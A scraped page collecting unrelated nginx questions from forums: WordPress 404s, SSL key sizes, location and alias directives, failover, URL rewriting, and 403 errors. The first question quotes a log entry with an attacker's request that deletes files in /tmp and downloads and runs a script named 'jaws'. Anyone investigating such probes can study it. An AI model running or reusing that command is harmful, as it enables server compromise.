Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs: - -  "GET /shell?cd+/tmp;rm+-rf+*;wget+;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world" - -  "GET / HTTP/1.1" 301 169 "http://[IP OF MY SERVER]:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" - -  "GET / HTTP/1.1" 400 157 "-" "-" - -  "GET / HTTP/1.1" 400 157 "-" "-" 

The IPs are, needless to say, not expected for this server.

I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell what specific exploit was attacked from these entries?

Why can’t I connect to the wordpress install page with Nginx?

I’m a newbie of WordPress. My environment is Ubuntu 18 + Nginx + PHP 7.

Following the tutorial(https://www.myfreax.com/how-to-install-wordpress-with-nginx-on-ubuntu-18-04/), the wordpress directory was placed on /var/www/html/device1.com.

Then I config the nginx, here is my nginx config:

server {     listen 80;     server_name www.device1.com device1.com;      server_name device1.com;      root /var/www/html/device1.com;     index index.php;       # log files     access_log /var/log/nginx/device1.com.access.log;     error_log /var/log/nginx/device1.com.error.log;      location = /favicon.ico {         log_not_found off;         access_log off;     }      location = /robots.txt {         allow all;         log_not_found off;         access_log off;     }      location / {         try_files $  uri $  uri/ /index.php?$  args;     }      location ~ \.php$   {         include snippets/fastcgi-php.conf;         fastcgi_pass unix:/run/php/php7.2-fpm.sock;     }      location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg)$   {         expires max;         log_not_found off;     }  } 

But, when I tried to connect to http://device1.com/wp-admin/install.php the Nginx responses 404, instead of returning the wordpress install page.

I don’t have any idea of checking the issue. Thanks for your suggestion.

Algorithm and key size to choose for SSL certificates (security and CPU wise) in 2020 (using nginx)

I posted this question already on SO, but as it is not really a programmin question I thought it might be a better place to ask here:

I want to setup a new SSL certificate store for generating SSL certs (server certs (nginx) and client certs (linux/windows devices))

I’m searching already for quite some time and I’m not sure I fully understand. especially as some articles are a few years old.

Many articles just talk about RSA end seem to recommend 2048 or 3072 though mentioning that 2048 is today probably still the best choice ( https://expeditedsecurity.com/blog/measuring-ssl-rsa-keys/ )

I found for example one Article ( https://paragonie.com/blog/2019/03/definitive-2019-guide-cryptographic-key-sizes-and-algorithm-recommendations ) but it seems to talk mostly about key encryption as @dave_thompson_085 pointed out on SO

stating in the section “Asymmetric (“Public Key”) Encryption”

Use, in order of preference:     X25519 (for which the key size never changes) then symmetric encryption.     ECDH with secp256r1 (for which the key size never changes) then symmetric encryption.     RSA with 2048-bit keys.  The security of a 256-bit elliptic curve cryptography key is about even with 3072-bit RSA.  Although many organizations are recommending migrating from 2048-bit RSA to 3072-bit RSA (or even 4096-bit RSA)  in the coming years, don't follow that recommendation. Instead migrate from RSA to elliptic curve cryptography, and then breathe easy while you keep an eye out for post-quantum cryptography recommendations. 

However they don’t mention the impact on server CPU usage compared to RSA 2048/3072/4048. I also didn’t find many other articles suggesting to switch to Elliptic curve algorithms.

Another article ) https://www.thesslstore.com/blog/you-should-be-using-ecc-for-your-ssl-tls-certificates/ _ tries to promote ECC instead of RSA, but comments on the article state, that ECC is less safe than RSA if quantum computers kick in. And the article cites nowhere numbers for what performance improvement to expect when using ECC.

https://crypto.stackexchange.com/questions/1190/why-is-elliptic-curve-cryptography-not-widely-used-compared-to-rsa mentions potentially legal issues and fear of being sued.

Though CPU usage is not a major issue Id still like to get some idea as I’d like to use the same CA and cert store also on devices like raspberries.

So what is today the best choice for certificate key algorithms and key sizes for server certs (old internet explorer not required but PCs, tablets, mobile phones being used today should be able to connect to the server

and what’s the best choice for client certs (will not be used on mobile devices)?

I kind of tend to RSA 2048, but I’m really not that sure I interpret all the articles correctly and don’t like to make choices based on feelings.

Location directive is not working correctly nginx

I am trying to open the location of my index.php file for example:

The root folder is:

Code (markup):

The the url a user will use to get to this root folder is:

Code (markup):

Every time I use this location declaration I get a 404 or forbidden message

location /server/client/ {           alias /path/to/my/root/folder;           try_files $  uri $  uri/ /index.php$  uri$  is_args$  args;        }
Code (markup):

I just cannot…

Location directive is not working correctly nginx

Add Failthrough server of a LAN IP to Nginx?

I’m trying to add my machine’s LAN IP as a ‘failthrough’ location to use in the event the main server has issues.

Lately, my main server name (i.e. https://myserver.domain.com) has been having some issues due to LetsEncrypt certs issues, so any URL running on my server using that domain name fails as well. What I want is to have Nginx automatically pass it to the machine’s IP instead if it detects the domain name itself is down.

I’m using the Docker LinuxServer LetsEncrypt container, and I’ve tried just adding the IP to the server_name variable in the config, but after restarting the container, nothing appears to change when trying to navigate to https://myserver.domain.com (it still just gives the same error page instead of redirecting to the IP).

Here’s the current config with the issue:

server {      listen 443 ssl http2 default_server;      root /config/www;     index index.php index.html index.htm;      server_name myserver.*;      # enable subfolder method reverse proxy confs     include /config/nginx/proxy-confs/*.subfolder.conf;      # Tell search engines not to crawl/add this domain     add_header X-Robots-Tag "noindex, nofollow, nosnippet, noarchive";      # all ssl related config moved to ssl.conf     include /config/nginx/ssl.conf;      # enable for ldap auth     #include /config/nginx/ldap.conf;      client_max_body_size 0;      location ~ \.php$   {         fastcgi_split_path_info ^(.+\.php)(/.+)$  ;         fastcgi_pass;         fastcgi_index index.php;         fastcgi_param  SCRIPT_FILENAME  $  document_root$  fastcgi_script_name;         include /etc/nginx/fastcgi_params;     } } 

Note this line in particular; the IP as the second server is the intended failthrough IP:

server_name myserver.*;

Also note: if I just use directly in a browser, it navigates to the intended page fine, so this has to be something config-wise with Nginx that I’m trying to solve. It seems like a pretty simple issue, but I’m not super familiar with Nginx config nuances yet.

Manejar locations con Nginx estilo Apache

les cuento que hace poco me muevo de Apache a NGINX y pues me entero que la forma en que manejan las URL es un poco diferente, debido a que debo corregir eso en brevedad, podria alguien mostrarme como hacer urls como estas en en el server block:

miweb.com/nombredelscript (Sin extension) miweb.com/un-titulo-web (que ejecute, por ejemplo: script2.php?titulo=$  1) miweb.com/trabajos/titulo-de-trabajo (que ejecute, por ejemplo: works.php?id=$  1) 

lo he intentado y no lo logro.

Nginx 403 Forbidden error on a simple conf file

I’ve got a new Ubuntu 18.04 droplet on DO. Just installed Nginx and Ufw (which is disabled for now) on it. I’ve this conf file inside the /etc/nginx/conf.d folder.

server {     listen 80 ;     listen [::]:80 ;          root /var/www/2;         index index.html index.htm index.nginx-debian.html;          server_name 2.hotelbobbygg.xyz;          location / {                 try_files $  uri $  uri/ =404;         } } 

I’ve also tried commenting out the 3rd line from last, i.e. try_files line. But it still behaves the same.

Pls help what is preventing me to access the index.html lying inside /var/www/2 folder.